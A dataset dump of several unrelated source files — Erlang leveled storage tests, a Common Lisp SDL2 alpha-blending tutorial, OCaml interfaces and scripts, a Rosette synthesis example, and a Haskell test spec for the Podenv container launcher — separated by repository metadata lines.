    IMMiterB = leveled_tree:match_range({o, "Bucket1", "Key1", null},
                                        {o, null, null, null},
                                        IMM3),
    io:format("Compare IMM3 with QueryArrary~n"),
    AccB = keyfolder(IMMiterB,
                        QueryArray,
                        {o, "Bucket1", "Key1", null}, {o, "Bucket1", "Key6", null},
                        {AccFun, [], Now}),
    ?assertMatch([{{o, "Bucket1", "Key1", null}, 8},
                    {{o, "Bucket1", "Key3", null}, 3},
                    {{o, "Bucket1", "Key4", null}, 10},
                    {{o, "Bucket1", "Key5", null}, 2},
                    {{o, "Bucket1", "Key6", null}, 7}], AccB).
%% Creating a new L0 file over an existing file of the same name should
%% succeed, and clearing the SST should leave the old content in the
%% .discarded file.
create_file_test() ->
    {RP, Filename} = {"test/test_area/", "new_file.sst"},
    ok = file:write_file(filename:join(RP, Filename), term_to_binary("hello")),
    KVL = lists:usort(generate_randomkeys({50000, 0})),
    Tree = leveled_tree:from_orderedlist(KVL, ?CACHE_TYPE),
    {ok, SP, noreply} =
        leveled_sst:sst_newlevelzero(RP,
                                        Filename,
                                        1,
                                        [Tree],
                                        undefined,
                                        50000,
                                        #sst_options{press_method = native}),
    {ok, SrcFN, StartKey, EndKey} = leveled_sst:sst_checkready(SP),
    io:format("StartKey ~w EndKey ~w~n", [StartKey, EndKey]),
    ?assertMatch({o, _, _, _}, StartKey),
    ?assertMatch({o, _, _, _}, EndKey),
    ?assertMatch("./new_file.sst", SrcFN),
    ok = leveled_sst:sst_clear(SP),
    {ok, Bin} = file:read_file("test/test_area/new_file.sst.discarded"),
    ?assertMatch("hello", binary_to_term(Bin)).
slow_fetch_test() ->
?assertMatch(not_present, log_slowfetch(2, not_present, "fake", 0, 1)),
?assertMatch("value", log_slowfetch(2, "value", "fake", 0, 1)).
coverage_cheat_test() ->
{noreply, _State0} = handle_info(timeout, #state{}),
{ok, _State1} = code_change(null, #state{}, null).
handle_down_test() ->
RootPath = "test/test_area/ledger",
clean_testdir(RootPath),
{ok, PCLr} =
pcl_start(#penciller_options{root_path=RootPath,
max_inmemory_tablesize=1000,
sst_options=#sst_options{}}),
FakeBookie = spawn(fun loop/0),
Mon = erlang:monitor(process, FakeBookie),
FakeBookie ! {snap, PCLr, self()},
{ok, PclSnap, null} =
receive
{FakeBookie, {ok, Snap, null}} ->
{ok, Snap, null}
end,
CheckSnapDiesFun =
fun(_X, IsDead) ->
case IsDead of
true ->
true;
false ->
case erlang:process_info(PclSnap) of
undefined ->
true;
_ ->
timer:sleep(100),
false
end
end
end,
?assertNot(lists:foldl(CheckSnapDiesFun, false, [1, 2])),
FakeBookie ! stop,
receive
{'DOWN', Mon, process, FakeBookie, normal} ->
ok
end,
?assert(lists:foldl(CheckSnapDiesFun, false, lists:seq(1, 10))),
pcl_close(PCLr),
clean_testdir(RootPath).
the fake bookie . Some calls to leveled_bookie ( like the two below )
calls ensures that the TEST controls the bookie 's Pid . The
FakeBookie .
loop() ->
receive
{snap, PCLr, TestPid} ->
{ok, Snap, null} =
leveled_bookie:snapshot_store(
leveled_bookie:empty_ledgercache(),
PCLr,
null,
{no_monitor, 0},
ledger,
undefined,
false),
TestPid ! {self(), {ok, Snap, null}},
loop();
stop ->
ok
end.
-endif.
|
11822951415820557e142cf6df49830b28be1ee96cdffd2795ac96c858b9be49 | TatriX/cl-sdl2-tutorial | 13-alpha-blending.lisp | (defpackage #:sdl2-tutorial-13-alpha-blending
(:use :cl)
(:export :run)
(:import-from :sdl2-tutorial-utils :asset-pathname))
(in-package #:sdl2-tutorial-13-alpha-blending)
(defparameter *screen-width* 640)
(defparameter *screen-height* 480)
(defclass tex ()
((renderer
:initarg :renderer
:initform (error "Must supply a renderer"))
(width
:accessor tex-width
:initform 0 )
(height
:accessor tex-height
:initform 0)
(texture
:accessor tex-texture
:initform nil)))
(defun load-texture-from-file (renderer filename)
(let ((tex (make-instance 'tex :renderer renderer)))
(with-slots (renderer texture width height) tex
(let ((surface (sdl2-image:load-image filename)))
(setf width (sdl2:surface-width surface))
(setf height (sdl2:surface-height surface))
(sdl2:set-color-key surface :true (sdl2:map-rgb (sdl2:surface-format surface)
0 #xFF #xFF))
(setf texture (sdl2:create-texture-from-surface renderer surface))))
tex))
(defun set-color (tex r g b)
(sdl2:set-texture-color-mod (tex-texture tex) r g b))
(defun set-blend-mode (tex blending)
(sdl2:set-texture-blend-mode (tex-texture tex) blending))
(defun set-alpha (tex alpha)
(sdl2:set-texture-alpha-mod (tex-texture tex) alpha))
(defun render (tex x y &key clip)
(with-slots (renderer texture width height) tex
(sdl2:render-copy renderer
texture
:source-rect clip
:dest-rect (sdl2:make-rect x
y
(if clip (sdl2:rect-width clip) width)
(if clip (sdl2:rect-height clip) height)))))
(defmacro with-window-renderer ((window renderer) &body body)
`(sdl2:with-init (:video)
(sdl2:with-window (,window
:title "SDL2 Tutorial 13"
:w *screen-width*
:h *screen-height*
:flags '(:shown))
(sdl2:with-renderer (,renderer ,window :index -1 :flags '(:accelerated))
,@body))))
(defun clamp (x)
(max 0 (min 255 x)))
(defmacro clamp-incf (x delta)
`(setf ,x (clamp (+ ,x ,delta))))
(defmacro clamp-decf (x delta)
`(setf ,x (clamp (- ,x ,delta))))
(defun run ()
(with-window-renderer (window renderer)
(sdl2-image:init '(:png))
(let ((bg-texture (load-texture-from-file renderer (asset-pathname "assets/13/fadein.png")))
(modulated-texture (load-texture-from-file renderer (asset-pathname "assets/13/fadeout.png")))
(alpha 255)
(delta 32))
(set-blend-mode modulated-texture :blend)
(sdl2:with-event-loop (:method :poll)
(:quit () t)
(:keydown (:keysym keysym)
(case (sdl2:scancode keysym)
(:scancode-w (clamp-incf alpha delta))
(:scancode-s (clamp-decf alpha delta))))
(:idle ()
(sdl2:set-render-draw-color renderer #xFF #xFF #xFF #xFF)
(sdl2:render-clear renderer)
(render bg-texture 0 0)
(set-alpha modulated-texture alpha)
(render modulated-texture 0 0)
(sdl2:render-present renderer))))))
| null | https://raw.githubusercontent.com/TatriX/cl-sdl2-tutorial/ac3613160df0120c4b12de6f7989add0e81c9e63/13-alpha-blending.lisp | lisp | (defpackage #:sdl2-tutorial-13-alpha-blending
(:use :cl)
(:export :run)
(:import-from :sdl2-tutorial-utils :asset-pathname))
(in-package #:sdl2-tutorial-13-alpha-blending)
(defparameter *screen-width* 640)
(defparameter *screen-height* 480)
(defclass tex ()
((renderer
:initarg :renderer
:initform (error "Must supply a renderer"))
(width
:accessor tex-width
:initform 0 )
(height
:accessor tex-height
:initform 0)
(texture
:accessor tex-texture
:initform nil)))
(defun load-texture-from-file (renderer filename)
(let ((tex (make-instance 'tex :renderer renderer)))
(with-slots (renderer texture width height) tex
(let ((surface (sdl2-image:load-image filename)))
(setf width (sdl2:surface-width surface))
(setf height (sdl2:surface-height surface))
(sdl2:set-color-key surface :true (sdl2:map-rgb (sdl2:surface-format surface)
0 #xFF #xFF))
(setf texture (sdl2:create-texture-from-surface renderer surface))))
tex))
(defun set-color (tex r g b)
(sdl2:set-texture-color-mod (tex-texture tex) r g b))
(defun set-blend-mode (tex blending)
(sdl2:set-texture-blend-mode (tex-texture tex) blending))
(defun set-alpha (tex alpha)
(sdl2:set-texture-alpha-mod (tex-texture tex) alpha))
(defun render (tex x y &key clip)
(with-slots (renderer texture width height) tex
(sdl2:render-copy renderer
texture
:source-rect clip
:dest-rect (sdl2:make-rect x
y
(if clip (sdl2:rect-width clip) width)
(if clip (sdl2:rect-height clip) height)))))
(defmacro with-window-renderer ((window renderer) &body body)
`(sdl2:with-init (:video)
(sdl2:with-window (,window
:title "SDL2 Tutorial 13"
:w *screen-width*
:h *screen-height*
:flags '(:shown))
(sdl2:with-renderer (,renderer ,window :index -1 :flags '(:accelerated))
,@body))))
(defun clamp (x)
(max 0 (min 255 x)))
(defmacro clamp-incf (x delta)
`(setf ,x (clamp (+ ,x ,delta))))
(defmacro clamp-decf (x delta)
`(setf ,x (clamp (- ,x ,delta))))
(defun run ()
(with-window-renderer (window renderer)
(sdl2-image:init '(:png))
(let ((bg-texture (load-texture-from-file renderer (asset-pathname "assets/13/fadein.png")))
(modulated-texture (load-texture-from-file renderer (asset-pathname "assets/13/fadeout.png")))
(alpha 255)
(delta 32))
(set-blend-mode modulated-texture :blend)
(sdl2:with-event-loop (:method :poll)
(:quit () t)
(:keydown (:keysym keysym)
(case (sdl2:scancode keysym)
(:scancode-w (clamp-incf alpha delta))
(:scancode-s (clamp-decf alpha delta))))
(:idle ()
(sdl2:set-render-draw-color renderer #xFF #xFF #xFF #xFF)
(sdl2:render-clear renderer)
(render bg-texture 0 0)
(set-alpha modulated-texture alpha)
(render modulated-texture 0 0)
(sdl2:render-present renderer))))))
| |
3ea7ef51bda9790f309608ab20d15406b83f6608481ab3a8a6853483f937eb79 | ogaml/ogaml | model.mli |
module Vertex : sig
type t
val create : position:OgamlMath.Vector3f.t ->
?normal:OgamlMath.Vector3f.t ->
?uv:OgamlMath.Vector2f.t ->
?color:Color.t -> unit -> t
val position : t -> OgamlMath.Vector3f.t
val normal : t -> OgamlMath.Vector3f.t option
val uv : t -> OgamlMath.Vector2f.t option
val color : t -> Color.t option
end
module Face : sig
type t
val create : Vertex.t -> Vertex.t -> Vertex.t -> t
val quad : Vertex.t -> Vertex.t -> Vertex.t -> Vertex.t -> (t * t)
val vertices : t -> (Vertex.t * Vertex.t * Vertex.t)
val paint : t -> Color.t -> t
val normal : t -> OgamlMath.Vector3f.t
end
exception Error of string
type t
(* Creation *)
val empty : t
val from_obj : string -> t
val cube : OgamlMath.Vector3f.t -> OgamlMath.Vector3f.t -> t
(* Transformation *)
val transform : t -> OgamlMath.Matrix3D.t -> t
val scale : t -> OgamlMath.Vector3f.t -> t
val translate : t -> OgamlMath.Vector3f.t -> t
val rotate : t -> OgamlMath.Quaternion.t -> t
Model modification
val add_face : t -> Face.t -> t
val paint : t -> Color.t -> t
val merge : t -> t -> t
val compute_normals : ?smooth:bool -> t -> t
val simplify : t -> t
val source : t -> ?index_source:IndexArray.Source.t
-> vertex_source:VertexArray.SimpleVertex.T.s VertexArray.VertexSource.t
-> unit -> unit
(* Iterators *)
val iter : t -> (Face.t -> unit) -> unit
val fold : t -> ('a -> Face.t -> 'a) -> 'a -> 'a
val map : t -> (Face.t -> Face.t) -> t
| null | https://raw.githubusercontent.com/ogaml/ogaml/5e74597521abf7ba2833a9247e55780eabfbab78/src/graphics/model/model.mli | ocaml | Creation
Transformation
Iterators |
module Vertex : sig
type t
val create : position:OgamlMath.Vector3f.t ->
?normal:OgamlMath.Vector3f.t ->
?uv:OgamlMath.Vector2f.t ->
?color:Color.t -> unit -> t
val position : t -> OgamlMath.Vector3f.t
val normal : t -> OgamlMath.Vector3f.t option
val uv : t -> OgamlMath.Vector2f.t option
val color : t -> Color.t option
end
module Face : sig
type t
val create : Vertex.t -> Vertex.t -> Vertex.t -> t
val quad : Vertex.t -> Vertex.t -> Vertex.t -> Vertex.t -> (t * t)
val vertices : t -> (Vertex.t * Vertex.t * Vertex.t)
val paint : t -> Color.t -> t
val normal : t -> OgamlMath.Vector3f.t
end
exception Error of string
type t
val empty : t
val from_obj : string -> t
val cube : OgamlMath.Vector3f.t -> OgamlMath.Vector3f.t -> t
val transform : t -> OgamlMath.Matrix3D.t -> t
val scale : t -> OgamlMath.Vector3f.t -> t
val translate : t -> OgamlMath.Vector3f.t -> t
val rotate : t -> OgamlMath.Quaternion.t -> t
Model modification
val add_face : t -> Face.t -> t
val paint : t -> Color.t -> t
val merge : t -> t -> t
val compute_normals : ?smooth:bool -> t -> t
val simplify : t -> t
val source : t -> ?index_source:IndexArray.Source.t
-> vertex_source:VertexArray.SimpleVertex.T.s VertexArray.VertexSource.t
-> unit -> unit
val iter : t -> (Face.t -> unit) -> unit
val fold : t -> ('a -> Face.t -> 'a) -> 'a -> 'a
val map : t -> (Face.t -> Face.t) -> t
|
54d1b8779c04118feb0c58bd8342f7efd98778c5bdb8bdf2621ddb71b5e66b62 | MaskRay/99-problems-ocaml | 28.ml | let lsort = List.sort (fun a b -> compare (List.length a) (List.length b))
| null | https://raw.githubusercontent.com/MaskRay/99-problems-ocaml/652604f13ba7a73eee06d359b4db549b49ec9bb3/21-30/28.ml | ocaml | let lsort = List.sort (fun a b -> compare (List.length a) (List.length b))
| |
67e569e754dd2fae2ffec5a2c0ccae1644927be5fc49b10ca0bdfc04f6214a61 | uw-unsat/leanette-popl22-artifact | ex2.rkt | #lang rosette
(require "lang.rkt")
(define (ex2)
(synthesize-program
(lambda (grid)
(begin
(grid-set! grid (point 0 0) 'a)
(grid-set! grid (point 0 2) 'b)))
(lambda (grid) (and (equal? 'a (grid-ref grid (point 4 2)))
(equal? 'b (grid-ref grid (point 0 0)))))))
(time (ex2))
| null | https://raw.githubusercontent.com/uw-unsat/leanette-popl22-artifact/80fea2519e61b45a283fbf7903acdf6d5528dbe7/rosette-benchmarks-4/fluidics/ex2.rkt | racket | #lang rosette
(require "lang.rkt")
(define (ex2)
(synthesize-program
(lambda (grid)
(begin
(grid-set! grid (point 0 0) 'a)
(grid-set! grid (point 0 2) 'b)))
(lambda (grid) (and (equal? 'a (grid-ref grid (point 4 2)))
(equal? 'b (grid-ref grid (point 0 0)))))))
(time (ex2))
| |
4330e53a4d3176e2129d02080373164100bb7dfe37a6bce2ba172107b0b25ff7 | ocaml/opam | print_config.ml | #directory "+compiler-libs";;
#load "ocamlcommon.cma";;
set_binary_mode_out stdout true;;
match List.tl (Array.to_list Sys.argv) with
| ["dll"] -> print_endline Config.ext_dll
| ["obj"] -> print_endline Config.ext_obj
| ["lib"] -> print_endline Config.ext_lib
| ["arch"] -> print_endline Config.architecture
| ["ccomp_type"] -> print_endline Config.ccomp_type
| ["system"] -> print_endline Config.system
| ["os_type"] -> print_endline Sys.os_type
| _ -> prerr_endline "print_config.ml: wrong usage"; exit 2
| null | https://raw.githubusercontent.com/ocaml/opam/074df6b6d87d4114116ea41311892b342cfad3de/shell/print_config.ml | ocaml | #directory "+compiler-libs";;
#load "ocamlcommon.cma";;
set_binary_mode_out stdout true;;
match List.tl (Array.to_list Sys.argv) with
| ["dll"] -> print_endline Config.ext_dll
| ["obj"] -> print_endline Config.ext_obj
| ["lib"] -> print_endline Config.ext_lib
| ["arch"] -> print_endline Config.architecture
| ["ccomp_type"] -> print_endline Config.ccomp_type
| ["system"] -> print_endline Config.system
| ["os_type"] -> print_endline Sys.os_type
| _ -> prerr_endline "print_config.ml: wrong usage"; exit 2
| |
d808c8d3973c33aca4c1619de8267e5af9f348f3b7b1c04bfa81747db69afe16 | podenv/podenv | Spec.hs | # LANGUAGE ImportQualifiedPost #
{-# LANGUAGE OverloadedStrings #-}
# LANGUAGE NoImplicitPrelude #
module Main where
import Data.Text qualified as Text
import Data.Text.IO qualified as Text
import Podenv hiding (loadConfig)
import Podenv.Capability (AppMode (..))
import Podenv.Capability qualified
import Podenv.Config
import Podenv.Context
import Podenv.Dhall
import Podenv.Env
import Podenv.Image
import Podenv.Main hiding (main)
import Podenv.Prelude
import Podenv.Runtime (ExecMode (..))
import Podenv.Runtime qualified
import System.Environment (setEnv)
import Test.Hspec
main :: IO ()
main = mockEnv >> doLoadConfig >>= hspec . spec
where
doLoadConfig = do
testConfig <- Podenv.Config.loadConfig (Just "./test/config.dhall")
goldenConfig <- Podenv.Config.loadConfig (Just "./test/golden.dhall")
pure (testConfig, goldenConfig)
Fix env values while keeping the host cache for dhall
mockEnv = do
curHome <- getEnv "HOME"
setEnv "XDG_CACHE_HOME" (curHome <> "/.cache")
setEnv "NIX_SSL_CERT_FILE" "/etc/hosts"
spec :: (Config, Config) -> Spec
spec (config, goldenConfig) = describe "unit tests" $ do
describe "config" $ do
let loadTest code expected = do
config' <- Podenv.Config.unConfig <$> loadConfig' code
map fst config' `shouldBe` expected
it "load simple" $ loadTest "env" [""]
it "load collection" $ loadTest "{ a = env, b = env}" ["a", "b"]
it "load nested" $ loadTest "{ a = { b = env, c = env}, d = env}" ["a.b", "a.c", "d"]
it "load weak" $ loadTest "{ image = { runtime.image = \"ubi\" }, nix = { runtime.nix = \"n\" } }" ["image", "nix"]
describe "golden" $ do
let mkGoldenConfig :: Maybe Config -> [String] -> IO Text
mkGoldenConfig configM args = do
cli <- usage args
cfg <- maybe (loadConfig (configExpr cli)) pure configM
(ar, mode, gl, run) <- cliConfigLoad "/volumes" testEnv cfg cli
ctx <- Podenv.Runtime.appToContext run mode ar
mappend ("==== " <> show args <> "\n") . Text.replace " --" "\n --"
<$> runReaderT (Podenv.Runtime.showCmd run Foreground ctx) gl
mkGolden = mkGoldenConfig (Just goldenConfig)
writeGolden :: [[String]] -> [[String]] -> IO ()
writeGolden xs ys = do
content <- Text.unlines <$> traverse mkGolden xs
content2 <- Text.unlines <$> traverse (mkGoldenConfig Nothing) ys
current <- Text.readFile "test/golden.txt"
let new =
-- work around typed-process display bug
Text.replace "--detach-keys -t" "--detach-keys \"\" -t"
. Text.unlines
$ [ show $ map fst (unConfig goldenConfig),
content,
content2
]
when (current /= new) $ do
Text.writeFile "test/golden.txt" new
putTextLn "Checkout `git diff`"
exitFailure
it "update golden.txt" $ do
writeGolden
[ ["legacy.vpn"],
["legacy.web"],
["corp.vpn"],
["corp.bridge"],
["--root", "--name", "ubi", "ubi"],
["--root", "--name", "ubi", "--namespace", "testns", "ubi"],
["--headless", "./test/headless.dhall", "firefox"],
["--network", "container:sway.vnc", "vnc-viewer", "localhost"],
["podenv"]
]
[ -- selector is removed from arg because it match the single app selector
["--config", "{env = {runtime.image = \"ubi8\" }}", "env", "id"],
-- the single app is automatically selected
["--config", "{env = {runtime.image = \"ubi8\" }}", "id"],
-- image selector
["image:ubi8"],
-- nix selector
["nix:test"],
-- run with name
["--name", "test", "image:ubi8"],
-- run net default
["--config", "{ runtime.image = \"ubi8\", capabilities.network = True }"],
-- run no-network
["--no-network", "--config", "{ runtime.image = \"ubi8\", capabilities.network = True }"],
-- run net private
["--network", "private", "image:ubi8"],
-- run net host
["--network", "host", "image:ubi8"],
-- run shared net
["--network", "vpn", "image:ubi8"],
wayland disable selinux
["--wayland", "image:ubi8"],
-- hostfile are substituted
["--hostfile", "image:ubi8", "cat", "/etc/hosts", "/proc/cmdline"],
shell override hostfile
["--shell", "--hostfile", "--terminal", "image:ubi8", "vi", "/etc/hosts"],
["--hostfile", "--terminal", "image:ubi8", "vi", "/etc/hosts"],
-- many volumes
["--volume", "/home/data:/tmp/data", "--volume", "/tmp", "--volume", "/old:/tmp/data", "image:ubi8"],
-- name override keep image
["--name", "tmp", "--config", "{ name = \"firefox\", runtime.image = \"localhost/firefox\" }"],
-- bwrap test
["--shell", "rootfs:/srv"]
]
describe "builder config" $ do
it "load firefox" $ do
(_, baseApp) <- mayFail $ Podenv.Config.select config ["firefox"]
let be = Podenv.Runtime.createLocalhostRunEnv testEnv
Text.take 34 (Podenv.Runtime.showBuildInfo be (baseApp ^. arApplication . appRuntime)) `shouldBe` "# Containerfile localhost/3c922bca"
it "load nixify" $ do
(_, baseApp) <- mayFail $ Podenv.Config.select config ["nixify", "firefox", "about:blank"]
let be = Podenv.Runtime.createLocalhostRunEnv testEnv
Text.take 34 (Podenv.Runtime.showBuildInfo be (baseApp ^. arApplication . appRuntime)) `shouldBe` "# Containerfile localhost/3c922bca"
it "override nixpkgs when necessary" $ do
let mkApp installables' pin =
Podenv.Config.defaultApp (Podenv.Dhall.Nix (Podenv.Dhall.Flakes Nothing installables' pin))
& (appName .~ "test")
checkCommand test app expected = do
ctx <- runPrepare (Regular []) testEnv (defaultAppRes app)
(ctx ^. ctxCommand) `test` expected
commandShouldContain = checkCommand shouldContain
commandShouldNotContain = checkCommand shouldNotContain
mkApp ["nixpkgs#hello"] (Just "nixpkgs/42") `commandShouldContain` ["--override-input", "nixpkgs"]
mkApp ["nixpkgs/42#hello"] (Just "nixpkgs/42") `commandShouldNotContain` ["--override-input", "nixpkgs"]
mkApp ["nixpkgs/42#hello", "nixGL"] (Just "nixpkgs/42") `commandShouldContain` ["--override-input", "nixpkgs"]
describe "cli parser" $ do
it "pass command args" $ do
cli <- Podenv.Main.usage ["--name", "test", "image:ubi8", "ls", "-la"]
Podenv.Main.cliExtraArgs cli `shouldBe` ["ls", "-la"]
it "handle separator" $ do
cli <- Podenv.Main.usage ["--name", "test", "image:ubi8", "--", "ls", "-la"]
Podenv.Main.cliExtraArgs cli `shouldBe` ["ls", "-la"]
describe "cli with single config" $ do
it "select app" $ cliTest "env" [] "env"
it "add args" $ cliTest "env" ["ls"] "env // { command = [\"ls\"]}"
it "add --arg" $ cliTest "env" ["--", "--arg"] "env // { command = [\"--arg\"]}"
it "set cap" $ cliTest "env" ["--wayland"] (addCap "env" "wayland = True")
it "unset cap" $ cliTest (addCap "env" "wayland = True") ["--no-wayland"] "env"
it "set volume" $ cliTest "env" ["--volume", "/tmp/test"] "env // { volumes = [\"/tmp/test\"]}"
it "one args" $ cliTest "\\(a : Text) -> env // { description = Some a }" ["a"] "env // { description = Some \"a\"}"
it "two args" $
cliTest
"\\(a : Text) -> \\(b : Text) -> env // { description = Some (a ++ b) }"
["a", "b"]
"env // { description = Some \"ab\"}"
describe "nix test" $ do
it "nix run without args" $ nixTest "{ runtime.nix = \"test\"}" [] ["run", "test"]
it "nix run with args" $
nixTest
"{env, test = { runtime.nix = \"test\"}}"
["test", "--help"]
["run", "test", "--", "--help"]
it "nix run with shell" $
nixTest
"{env, test = { runtime.nix = \"test\", command = [\"cmd\"]}}"
["test", "--help"]
["shell", "test", "--command", "cmd", "--help"]
describe "podman ctx" $ do
let defRun xs = ["run", "--rm"] <> xs <> ["--label", "podenv.selector=unknown", defImg]
let podmanTest code expected = do
ar <- loadOne (addCap code "network = True, rw = True")
ctx <- runPrepare (Regular []) testEnv ar
Podenv.Runtime.podmanRunArgs defRe fg ctx (getImg ar) `shouldBe` expected
it "run simple" $ podmanTest "env" (defRun [])
it "run simple root" $
podmanTest
"env // { capabilities.root = True }"
(defRun ["--user", "0", "--workdir", "/root", "--env", "HOME=/root", "--volume", "/data/podenv-home:/root"])
it "run syscaps" $
podmanTest
"env // { syscaps = [\"NET_ADMIN\"] }"
(defRun ["--cap-add", "CAP_NET_ADMIN"])
it "run hostdir" $
podmanTest
"env // { volumes = [\"/tmp/test\"]}"
(defRun ["--security-opt", "label=disable", "--volume", "/tmp/test:/tmp/test"])
it "run volumes" $
podmanTest
"env // { volumes = [\"nix-store:/nix\"]}"
(defRun ["--volume", "/data/nix-store:/nix"])
it "run home volumes" $
podmanTest
"env // { volumes = [\"~/src:/data\"]}"
(defRun ["--security-opt", "label=disable", "--volume", "/home/user/src:/data"])
it "run many volumes" $
podmanTest
"env // { volumes = [\"/home/data:/tmp/data\", \"/tmp\", \"/home/old-data:/tmp/data\"]}"
(defRun ["--security-opt", "label=disable", "--volume", "/tmp:/tmp", "--volume", "/home/data:/tmp/data"])
where
defImg = "ubi8"
defRe = Podenv.Runtime.defaultGlobalEnv "/data"
runPrepare mode env app = runAppEnv env app $ Podenv.Capability.prepare mode
testEnv =
AppEnv
{ _envHostXdgRunDir = Just "/run/user/1000",
_envHostWaylandSocket = Just (SocketName "wayland-0"),
_envHostHomeDir = Just "/home/user",
_envHostCwd = "/usr/src/podenv",
_envHostUid = 1000,
_envAppHomeDir = Nothing,
_envHostDisplay = ":0",
_envHostSSHAgent = Nothing,
_envIsNVIDIAEnabled = pure False,
_envGetAppHomeDir = \app -> pure $ case app ^. Podenv.Dhall.appRuntime of
Podenv.Dhall.Nix _ -> Just "/home/user"
Podenv.Dhall.Container cb -> toString <$> cb ^. cbImage_home
_ -> Nothing,
_envGetVideoDevices = pure [],
_envGetCertLocation = pure $ Just "/etc/ca"
}
getImg app = case app ^. Podenv.Dhall.arApplication . Podenv.Dhall.appRuntime of
Podenv.Dhall.Image image -> ImageName image
_ -> error "Not podman"
fg = Foreground
getApp code args = do
cli <- Podenv.Main.usage args
cfg <- loadConfig' code
(app, mode, _, _) <- Podenv.Main.cliConfigLoad "/volumes" testEnv cfg cli
runPrepare mode (testEnv & envAppHomeDir ?~ "/home") app
cliTest :: Text -> [String] -> Text -> IO ()
cliTest gotCode args expectedCode = do
got <- getApp gotCode args
expected <- getApp expectedCode []
let removeSelector = ctxLabels .~ mempty
(got & removeSelector) `shouldBe` (expected & removeSelector)
nixTest code args expectedCommand = do
ctx <- getApp code args
drop 3 (ctx ^. ctxCommand) `shouldBe` expectedCommand
addCap code capCode =
"( " <> code <> " // { capabilities = (" <> code <> ").capabilities // {" <> capCode <> "}})"
mkConfig code =
unlines
[ "let Podenv = env:PODENV",
"let Nix = Podenv.Nix",
"let def = { capabilities = {=}, runtime = Podenv.Image \"ubi8\" }",
"let env = def in ",
code
]
loadConfig' code = Podenv.Config.loadConfig (Just . mkConfig $ code)
loadOne code = do
config' <- loadConfig' code
pure $ case Podenv.Config.unConfig config' of
[(_, Podenv.Config.LitApp x)] -> defaultAppRes (Podenv.Config.unRecord x)
_ -> error "Expected a single app"
| null | https://raw.githubusercontent.com/podenv/podenv/9f5d2aec7a7af8b9e68b6dbb1716753e62b89991/test/Spec.hs | haskell | # LANGUAGE OverloadedStrings #
work around typed-process display bug
selector is removed from arg because it match the single app selector
the single app is automatically selected
image selector
nix selector
run with name
run net default
run no-network
run net private
run net host
run shared net
hostfile are substituted
many volumes
name override keep image
bwrap test
arg\"]}" | # LANGUAGE ImportQualifiedPost #
# LANGUAGE NoImplicitPrelude #
module Main where
import Data.Text qualified as Text
import Data.Text.IO qualified as Text
import Podenv hiding (loadConfig)
import Podenv.Capability (AppMode (..))
import Podenv.Capability qualified
import Podenv.Config
import Podenv.Context
import Podenv.Dhall
import Podenv.Env
import Podenv.Image
import Podenv.Main hiding (main)
import Podenv.Prelude
import Podenv.Runtime (ExecMode (..))
import Podenv.Runtime qualified
import System.Environment (setEnv)
import Test.Hspec
main :: IO ()
main = mockEnv >> doLoadConfig >>= hspec . spec
where
doLoadConfig = do
testConfig <- Podenv.Config.loadConfig (Just "./test/config.dhall")
goldenConfig <- Podenv.Config.loadConfig (Just "./test/golden.dhall")
pure (testConfig, goldenConfig)
Fix env values while keeping the host cache for dhall
mockEnv = do
curHome <- getEnv "HOME"
setEnv "XDG_CACHE_HOME" (curHome <> "/.cache")
setEnv "NIX_SSL_CERT_FILE" "/etc/hosts"
spec :: (Config, Config) -> Spec
spec (config, goldenConfig) = describe "unit tests" $ do
describe "config" $ do
let loadTest code expected = do
config' <- Podenv.Config.unConfig <$> loadConfig' code
map fst config' `shouldBe` expected
it "load simple" $ loadTest "env" [""]
it "load collection" $ loadTest "{ a = env, b = env}" ["a", "b"]
it "load nested" $ loadTest "{ a = { b = env, c = env}, d = env}" ["a.b", "a.c", "d"]
it "load weak" $ loadTest "{ image = { runtime.image = \"ubi\" }, nix = { runtime.nix = \"n\" } }" ["image", "nix"]
describe "golden" $ do
let mkGoldenConfig :: Maybe Config -> [String] -> IO Text
mkGoldenConfig configM args = do
cli <- usage args
cfg <- maybe (loadConfig (configExpr cli)) pure configM
(ar, mode, gl, run) <- cliConfigLoad "/volumes" testEnv cfg cli
ctx <- Podenv.Runtime.appToContext run mode ar
mappend ("==== " <> show args <> "\n") . Text.replace " --" "\n --"
<$> runReaderT (Podenv.Runtime.showCmd run Foreground ctx) gl
mkGolden = mkGoldenConfig (Just goldenConfig)
writeGolden :: [[String]] -> [[String]] -> IO ()
writeGolden xs ys = do
content <- Text.unlines <$> traverse mkGolden xs
content2 <- Text.unlines <$> traverse (mkGoldenConfig Nothing) ys
current <- Text.readFile "test/golden.txt"
let new =
Text.replace "--detach-keys -t" "--detach-keys \"\" -t"
. Text.unlines
$ [ show $ map fst (unConfig goldenConfig),
content,
content2
]
when (current /= new) $ do
Text.writeFile "test/golden.txt" new
putTextLn "Checkout `git diff`"
exitFailure
it "update golden.txt" $ do
writeGolden
[ ["legacy.vpn"],
["legacy.web"],
["corp.vpn"],
["corp.bridge"],
["--root", "--name", "ubi", "ubi"],
["--root", "--name", "ubi", "--namespace", "testns", "ubi"],
["--headless", "./test/headless.dhall", "firefox"],
["--network", "container:sway.vnc", "vnc-viewer", "localhost"],
["podenv"]
]
["--config", "{env = {runtime.image = \"ubi8\" }}", "env", "id"],
["--config", "{env = {runtime.image = \"ubi8\" }}", "id"],
["image:ubi8"],
["nix:test"],
["--name", "test", "image:ubi8"],
["--config", "{ runtime.image = \"ubi8\", capabilities.network = True }"],
["--no-network", "--config", "{ runtime.image = \"ubi8\", capabilities.network = True }"],
["--network", "private", "image:ubi8"],
["--network", "host", "image:ubi8"],
["--network", "vpn", "image:ubi8"],
wayland disable selinux
["--wayland", "image:ubi8"],
["--hostfile", "image:ubi8", "cat", "/etc/hosts", "/proc/cmdline"],
shell override hostfile
["--shell", "--hostfile", "--terminal", "image:ubi8", "vi", "/etc/hosts"],
["--hostfile", "--terminal", "image:ubi8", "vi", "/etc/hosts"],
["--volume", "/home/data:/tmp/data", "--volume", "/tmp", "--volume", "/old:/tmp/data", "image:ubi8"],
["--name", "tmp", "--config", "{ name = \"firefox\", runtime.image = \"localhost/firefox\" }"],
["--shell", "rootfs:/srv"]
]
describe "builder config" $ do
it "load firefox" $ do
(_, baseApp) <- mayFail $ Podenv.Config.select config ["firefox"]
let be = Podenv.Runtime.createLocalhostRunEnv testEnv
Text.take 34 (Podenv.Runtime.showBuildInfo be (baseApp ^. arApplication . appRuntime)) `shouldBe` "# Containerfile localhost/3c922bca"
it "load nixify" $ do
(_, baseApp) <- mayFail $ Podenv.Config.select config ["nixify", "firefox", "about:blank"]
let be = Podenv.Runtime.createLocalhostRunEnv testEnv
